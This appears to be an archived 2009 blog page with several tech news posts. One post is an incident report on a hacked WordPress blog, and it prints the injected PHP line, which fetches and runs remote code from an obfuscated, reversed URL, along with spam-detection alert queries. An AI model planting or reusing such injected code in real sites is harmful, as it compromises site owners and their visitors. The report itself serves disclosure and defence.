May 29th, 2009
PricewaterhouseCoopers is one of the largest “professional services” organizations and has always been strong on technology consulting and advice. The Spring issue of its quarterly Technology Forecast journal focuses on the Semantic Web. This is from the table of contents:
- 04 Spinning a data Web. Semantic Web technologies could revolutionize enterprise decision making and information sharing. Here’s why.
- 20 Making Semantic Web connections. Linked Data technology can change the business of enterprise data management.
- 16 Traversing the Giant Global Graph. Tom Scott of BBC Earth describes how everyone benefits from interoperable data.
- 28 From folksonomies to ontologies. Uche Ogbuji of Zepheira discusses how early adopters are introducing Semantic Web to the enterprise.
- 40 How the Semantic Web might improve cancer treatment. M. D. Anderson’s Lynn Vogel explores new techniques for combining clinical and research data.
- 46 Semantic technologies at the ecosystem level. Frank Chum of Chevron talks about the need for shared ontologies in the oil and gas industry.
You can download the free 58-page report here. You can also read a note on the issue in ReadWriteWeb, which focuses on linked data and interoperability.
“A new PricewaterhouseCoopers Technology report explains how the Semantic Web and Linked Data can help enterprises manage their large scale data better. The PwC Center for Technology and Innovation team spent several months researching and analyzing the problem of data silos in enterprises – and what solutions are being developed to help with that problem. The answer, according to PwC, is Semantic Web techniques. PwC believes that the Semantic Web offers a practical way to address the problem of large-scale data integration. …”
May 24th, 2009
For the past five years UCSD has run a student datamining contest sponsored by FICO, the decision management firm famous for developing the FICO credit score. The details of the 2009 datamining contest were released last week with results due on 15 July.
“This year’s contest consists of two classification tasks based on e-commerce transaction anomaly data. The first task is to maximize accuracy of binary classification on a test data set, given a fully labeled training data set. The performance metric is the lift at 20% review rate. The second task is similar to task 1, but provides a couple of additional fields that have potential predictive information.”
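The contest announcement names the metric but does not spell out the formula. Here is a minimal sketch of one common reading of "lift at 20% review rate": rank the test cases by predicted score, review the top 20%, and divide the fraction of all anomalies caught there by the fraction of cases reviewed. The function name and the toy data are ours, and the contest's exact definition may differ.

```python
def lift_at_review_rate(labels, scores, review_rate=0.20):
    """Lift = (share of positives found in the reviewed slice) / (share reviewed).

    labels: 0/1 ground truth, scores: higher means more suspicious.
    This is an assumed definition, not the contest's official scorer.
    """
    if not labels or len(labels) != len(scores):
        raise ValueError("labels and scores must be non-empty and equal length")
    total_positives = sum(labels)
    if total_positives == 0:
        raise ValueError("lift is undefined when there are no positives")

    # Number of cases we can afford to review (at least one).
    n_review = max(1, round(len(labels) * review_rate))

    # Review the highest-scoring cases first.
    ranked = sorted(zip(scores, labels), key=lambda pair: pair[0], reverse=True)
    caught = sum(label for _, label in ranked[:n_review])

    capture_rate = caught / total_positives
    reviewed_share = n_review / len(labels)
    return capture_rate / reviewed_share


# Toy data: 10 transactions, 2 anomalies, both ranked at the top.
toy_labels = [1, 0, 0, 0, 0, 1, 0, 0, 0, 0]
toy_scores = [0.9, 0.1, 0.2, 0.3, 0.4, 0.8, 0.05, 0.15, 0.25, 0.35]
toy_lift = lift_at_review_rate(toy_labels, toy_scores)
```

Under this reading, a random ranking gives a lift near 1, and the best possible lift at a 20% review rate is 5.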
The contest is open to all full-time undergraduate and graduate students as well as postdocs. A total of $8,000 in prize money will be awarded in various categories.
(spotted on Hacker News)
May 21st, 2009
Who says that Twitter is not useful? The Boston Police Department is on record as promising to use Twitter to alert us if and when the zombie apocalypse starts. You might want to check for #zombie before you go out the door in the morning.
May 21st, 2009
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.
<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
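The reversed-string trick is easy to undo. The sketch below mirrors what PHP's strrev() does and also shows one rough way to look for other reversed URLs in a source file. The helper names and the regular expression are our own illustration, not part of any tool, and the code only decodes the string; it never fetches the address.

```python
import re

# The string literal exactly as it appears in the injected code above.
OBFUSCATED = "txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"


def unreverse(text):
    """Return the characters in reverse order, like PHP's strrev()."""
    return text[::-1]


def find_reversed_urls(source):
    """Find quoted strings that end in a reversed 'http://' or 'https://'.

    A heuristic only: it assumes the reversed URL sits alone inside
    one pair of quotes, as it does in the injected snippet.
    """
    pattern = re.compile(r"""["']([^"']*//:s?ptth)["']""")
    return [unreverse(match) for match in pattern.findall(source)]


decoded = unreverse(OBFUSCATED)

# Scan a fragment of the injected code for hidden URLs.
fragment = 'file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))'
hidden = find_reversed_urls(fragment)
```

The decoded address points at the same blogwp.info host that appears in plain text in the $stprot variable, so the reversal only hides the URL from a casual search for "http://".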
We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
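For anyone who wants to set up the same kind of alert for their own site, here is a small sketch that builds queries in the form shown above and checks a piece of page text for the same terms locally. The function names are hypothetical, and the local check is a crude whole-word match that will produce the same sort of false positives the alerts do.

```python
import re

PHARMA_TERMS = ["viagra", "cialis", "levitra", "Phentermine", "Xanax"]


def build_alert_query(terms, host):
    """Join the terms with OR and restrict the search to one host via site:."""
    return " OR ".join(terms) + " site:" + host


def spam_terms_in(text, terms):
    """Return the terms that occur as whole words in text, ignoring case."""
    words = set(re.findall(r"[a-z0-9]+", text.lower()))
    return [term for term in terms if term.lower() in words]


query = build_alert_query(PHARMA_TERMS, "ebiquity.umbc.edu")

# A legitimate post that merely mentions a term still matches.
hits = spam_terms_in("Cheap Viagra and xanax here", PHARMA_TERMS)
```

The query string is what you would paste into the alert form; the local check could be run against your own pages between alert deliveries.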
The results of this Google search reveal many compromised blogs from the .edu domain.
May 15th, 2009
Wolfram|Alpha is live. A document describing the Wolfram|Alpha API can be found in Google’s cache.
Stephen Wolfram wrote today in a blog post, Wolfram|Alpha Is Launching: Made Possible by Mathematica, on its relation to Mathematica.
“Wolfram|Alpha defines a new direction in computing—that would have simply not have been possible without Mathematica, and that in time will add some remarkable new dimensions to Mathematica itself. In terms of technology, Wolfram|Alpha is a uniquely complex software system, which has been entirely developed and deployed with Mathematica and Mathematica technologies. … When we launch Wolfram|Alpha this weekend, it will be running Mathematica on about 10,000 processor cores, using gridMathematica-based parallelism. And every single query that comes into the system will be served with webMathematica.”
And now, for a real test…
(spotted on Hacker News)
UPDATE: (5/18) The API document is officially now available.
May 12th, 2009
Google has announced that it will begin to recognize structured information encoded as metadata in either RDFa or microformats and use the metadata in search results snippets for reviews and people.
“Structured data makes the web a better place. It also helps Google better understand and present your page in search results. … Google’s first use of this data will be in search results snippets for two kinds of objects: Reviews and People. Providing more detail in search results helps users to understand the value of your pages. When users get more information showing how your page is relevant to their search, they’re more likely to click through to see the full page. … At Google, we believe in openness, so we are using two open standards to allow you to annotate structured data on your site: microformats and RDFa. Both standards allow markup of information on your pages.”
This is a case where Google is following Yahoo, which announced more general support for RDFa and microformats last fall as part of its SearchMonkey platform.
We expect that this is a work in progress. While it’s great that Google is supporting RDFa annotations, they are asking people to start with the new RDF vocabulary defined at their site http://www.data-vocabulary.org/ rather than reusing or integrating with existing, widely used vocabularies. Let’s hope that they embrace the LOD vision in the near future.
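To make the kind of annotation under discussion concrete, here is a rough sketch of a review marked up with RDFa and a few lines of Python that pull the property/value pairs back out. The namespace URI and the property names (v:itemreviewed, v:reviewer, v:rating) are as we recall them from the data-vocabulary.org documentation and should be treated as assumptions; the review content is made up. The collector is a deliberately naive illustration, not a conforming RDFa processor.

```python
from html.parser import HTMLParser

# Sample markup; vocabulary terms are assumed, values are invented.
SAMPLE = """
<div xmlns:v="http://rdf.data-vocabulary.org/#" typeof="v:Review">
  <span property="v:itemreviewed">Example Pizza Place</span>
  reviewed by <span property="v:reviewer">A. Reviewer</span>.
  Rating: <span property="v:rating">4.5</span>
</div>
"""


class RDFaPropertyCollector(HTMLParser):
    """Collect typeof values and the text of elements carrying a property."""

    def __init__(self):
        super().__init__()
        self.types = []
        self.properties = {}
        self._current = None  # property of the element being read, if any

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if "typeof" in attributes:
            self.types.append(attributes["typeof"])
        self._current = attributes.get("property")

    def handle_data(self, data):
        # Only keep text that sits directly inside a property element.
        if self._current and data.strip():
            self.properties[self._current] = data.strip()

    def handle_endtag(self, tag):
        self._current = None


def extract_rdfa(html):
    """Return (types, properties) found in an HTML fragment."""
    collector = RDFaPropertyCollector()
    collector.feed(html)
    collector.close()
    return collector.types, collector.properties


types, properties = extract_rdfa(SAMPLE)
```

A real consumer would resolve the v: prefix to the full namespace URI and handle nesting and the content attribute, which is exactly where reusing existing vocabularies would pay off.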